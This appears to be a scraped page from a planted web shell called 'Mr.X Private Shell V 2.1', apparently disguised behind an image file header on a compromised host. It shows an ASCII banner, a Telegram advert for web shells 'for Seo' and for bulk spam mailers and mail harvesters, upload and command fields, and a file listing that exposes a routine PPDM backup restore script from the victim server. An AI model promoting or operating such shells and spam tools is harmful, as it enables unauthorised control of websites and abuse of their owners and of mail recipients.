����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# restore with PPDM

for asset in "${!PPDM_ASSETS_AND_SSIDS[@]}"; do
    ssid=${PPDM_ASSETS_AND_SSIDS[$asset]}
    LogPrint "Starting restore of $asset"

    ddfsrc -r "/mnt/local/$asset" -S $ssid -i y \
        -h DFA_SI_DD_HOST=$PPDM_DD_IP \
        -h DFA_SI_DD_USER=$PPDM_DD_USERNAME \
        -h DFA_SI_DEVICE_PATH=$PPDM_STORAGE_UNIT 1>&7 2>&8 ||
        Error "Failed to restore $asset"
    unset ssid
    LogPrint "Finished restoring $asset"
done

Filemanager

Name Type Size Permission Actions
400_restore_with_ppdm.sh File 454 B 0644